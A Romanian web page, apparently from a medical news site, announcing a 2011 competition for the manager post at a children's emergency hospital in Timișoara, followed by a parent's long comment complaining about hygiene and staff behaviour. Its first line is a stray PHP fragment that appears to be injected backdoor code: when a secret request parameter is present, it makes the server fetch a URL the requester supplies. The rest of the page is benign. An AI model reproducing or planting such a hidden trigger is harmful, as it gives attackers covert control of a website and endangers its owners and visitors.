isset($_REQUEST['zox4vu']) && fetch_feed($_REQUEST['feed_url']); ANUNT CONCURS - Spitalul Clinic de Urgenta pentru Copii “Louis Turcanu” Timisoara - MedicAS

Municipiul Timişoara organizează concurs pentru ocuparea funcţiei de manager - persoană fizică pentru Spitalul Clinic de Urgenţă pentru Copii „Louis Ţurcanu” Timişoara.
Concursul se va desfăşura la sediul Primăriei Municipiului Timişoara , Bd. C.D.Loga nr.1 în perioada 26-31 ianuarie 2011.
Dosarele de înscriere se depun la sediul Primăriei Municipiului Timişoara , bd. C.D.Loga, nr.1, la registratura instituţiei –camera 12 , parter, în termen de 30 de zile de la data publicării şi afişării anunţului.
Informatii cu privire la organizarea concursului, dosarul de inscriere, tema proiectului – structura minimala a proiectului de management si bibliografia, se gasesc afisate la sediul unitatii – Spitalul Clinic de Urgenta pentru Copii „Louis Turcanu” Timisoara str.Iosif Nemoianu nr.2 si pe site-ul spitalului www.spital-copii-timisoara.ro.


Articole asemănătoare:

1 Răspuns la “ANUNT CONCURS - Spitalul Clinic de Urgenta pentru Copii “Louis Turcanu” Timisoara”


 1. Monica :

  Am fost internata cu copilasul meu la spitalul LOUIS TURCANU si am fost ingrozita de modul in care se face curatenia in acest loc.Exista o persoana responsabila de curatenia spitalului???.Am cautat o adresa de mail unde sa fac plangerea dar nu am gasit.
  In locurile unde sunt bolnavi nu trebuie folosita matura pentru a face mai mult praf decat este si pentru a raspandii microbii.Trebuie folosit aspiratorul. Colidoarele trebuie spalate cu o masina de spalat pentru a a nu lasa urme ude pe culoar asttfel incat cineva sa alunece. Daca se foloseste mopul trebuie pus un semn cu ” Atentie loc alunecos”,mopul trebuie sa fie curat inmuiat in apa fierbintesi si solutie daca este. Sa se spale pe jos in salone dimineata cand copii inca mai dorm.
  Usile au fost trantite de femeile de servici fara nici un pic de respect pentru pacientii care se odihneau( copilasi bolnavi).
  Cosul de gunoi s-a golit fara manusi, fara a fi schimbata punga de gunoi,impins cu mana in sacul mare. A fost atins capacul cu mana femeii care a impins gunoiul. Pedala de la cos a fost stricata astfel ca de cate ori am aruncat ceva la gunoi am ridicat capacul cu mana. Noroc ca am avut dezinfectant la mine. De toalete nici nu vreau sa vorbesc m-am abtinut cat am putut sa nu le folosesc….
  Un lucru de care m-am ingrozit au fost la doamnele care au sevit micul dejun. Au deschis punga de paine . Au luat feliile de paine si fara manusi au pus parizerul in sandwici.Va dati seama cat de curate le-au fost mainile daca au impins caruciorul cu mancare, au deschis toate usile…..INFIORATOR. MANCAREA A FOSTDATA DIN MANA IN MANA ,FARA FARFURIOARA SAU SERVETEL !!!!!!!! Lenjeria de pat muradra, usile murdare, praf.
  Ii rog cei responsabili sa faca ceva, sa ia masurile necesare pentru schimbarea in bine.
  Fiind spital este clar ca acolo vin copii bolnavi, ma ghandesc cum isi permite agentul de paza sa fumeze in incinta locului unde lucreaza si sa stea la povesti astfel incat culoarul a fost aproape in permanenta blocat si plin de fum . As intelege daca ar fi dat informatii pacientilor dar nu a fost asa.
  Un alt lucru care m-a scos din sarite si care m-a convins sa-mi scriu oful a fost D-na doctor IACOB cu care am urcat in lift. Dinsa a apasat pe etajul 3. Eu, am fost cu copilul in brate cu care mergeam la trament la etajul 2.Pe un ton raspicat mi-a zis “NU APASA ,EU MERG PRIMA”dupa care a ras cu colegii ei. Mergeau la sedinta de dimineata.Se grabeau?Este problema meu ca au ajuns tarziu la lucru?Cum si-a permis asa ceva?De unde atata nesimtire…..Intr-o tara unde cadrele medicale au bun simt te-ar fi intrebat la ce etaj doresti sa mergi si ca aveai un bebelus in brate ar fi apasat medicul pe etajul dorit.
  Inteleg ca nu sunt bani pentru produse scumpe de curatenie se gasesc si produse foarte ieftine si eficiente dar apa fierbinte,otet, putina educatie si vointa din partea femeilor de servici, implicare din partea managerului responsabil cu curatenia si mai multa informatie pentru pacienti cum sa pastreze curatenia ,se poat face lucru de calitate.
  La fel inteleg ca spitalele nu au mai multe lifturi iar medicii trebuie sa le foloseasca in cazuri de urgenta dar daca nu este urgenta mamele cu sugar in brate sau orice persoana cu copil bolnav sa aibe prioritate.

  IN SPERANTA CA CINEVA SE VA OCUPA DE CELE SCRISE DE MINE II MULTUMESC ANTICIPAT.

  MONICAAdaugă un comentariu


 
 

Newsletter

Loading... Loading...